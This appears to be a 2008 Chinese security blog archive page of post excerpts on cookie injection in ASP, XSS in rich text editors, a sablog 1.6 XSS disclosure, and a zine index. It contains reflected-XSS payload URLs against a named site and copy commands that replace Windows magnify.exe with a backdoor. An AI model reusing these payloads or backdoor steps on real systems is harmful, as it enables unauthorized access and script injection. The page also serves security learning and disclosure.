2008年3月 的日志

Cookie注入是怎样产生的

作者:啊D

现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~感觉这样的防注入系统不错,但防注入系统没有注意到 Cookies 的问题!所以就有了Cookies注入~~

我们来研究一下怎样情况下才会有Cookies注入!如果你学过ASP你应该会知道
Request.QueryString (GET)

Request.Form (POST)!
呵,没错,这就是我们用于读取用户发给WEB服务器的指定键中的值!我们有时为了简化代码,会写成
ID=Request("ID")

这样写法是简单了,但问题就来了~~~我们先看WEB服务是怎样读取数据的,他是先取GET中的数据,没有再取POST中的数据,还会去取Cookies中的数据(晕,书上没有这么说,这是和小高交流时才知道~~看来书说的不全~~)
阅读全文 »

Tags: , ,

黑客入门之富文本编辑器的跨站脚本问题

来源:Neeao's Security Blog

富文本编辑器是一个开放式的HTML内容编辑环境,必须实现文字样式、链接、图片等功能的HTML,所以用户 POST的内容必须含有HTML标签,但是任由用户输入各类HTML标签,会造成一些潜在的恶意脚本攻击,借这类情况正好分析出现XSS的情况,主要针对 IE浏览器.

一.首先是微软建议我们可能造成恶意脚本攻击的标签.

类似如下的

tag:

applet
base
basefont
bgsound
blink
body
embed
frame
frameset
head
html
ilayer
iframe
layer
link
meta
object
style
title
script

———————————–
阅读全文 »

Tags:

sablog 1.6 多个跨站漏洞

Date:2008-03-27
Author:amxku[c.r.s.t]
Version:sablog 1.6

由于过滤不严,存在多个跨站漏洞

PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1
阅读全文 »

Tags: , ,

放大镜后门生成器

来源:红狼论坛
PS:刚刚在红狼论坛看到的,具体未测试…简单看了下,估计是类似以前那种 shift 后门差不多….
设本程序为ivy.exe则运行以下命令即可

copy %systemroot%\system32\magnify.exe %systemroot%\system32\nagnify.exe
copy ivy.exe %systemroot%\system32\magnify.exe
copy ivy.exe %systemroot%\system32\dllcache\magnify.exe

注:win+u,选择放大镜,输入你设定的后门启动密码,可执行cmd.exe和程序自己添加自定义用户(调用API防止cmd.exe被禁用)
阅读全文 »

Tags:

DNS批量溢出批处理代码

阅读全文 »

Tags:

发送 百度Hi 邀请

哪位朋友需要邀请的请留言
留下您的我email地址或者百度的ID都行
留email的需要去信箱里看信,留百度ID的则直接去百度登陆后收消息就OK了。
我开了我blog中guest组的评论权限,需要百度Hi 邀请的朋友留言吧~
不过这两天在外面,上网不方便,明天我会统一发放。

Tags: ,

[PSTZine 0x01] (Ph4nt0m Webzine 第一期) 打包下载

刚才连续发了六篇文章:
1、[PSTZine 0x01][0x01][Introduction]
2、[PSTZine 0x01][0x02][An improvement on mixed case alphanumeric shellcode decoder]
3、[PSTZine 0x01][0x03][做一个优秀的木匠]
阅读全文 »

Tags: , ,

[PSTZine 0x01][0x06][利用httponly提升应用程序安全性]

==Ph4nt0m Security Team==

Issue 0x01, Phile #0x06 of 0x06

|=—————————————————————————=|
|=————-=[ 利用httponly提升应用程序安全性 ]=————–=|
|=—————————————————————————=|
|=——————————— 阅读全文 »

Tags: , , ,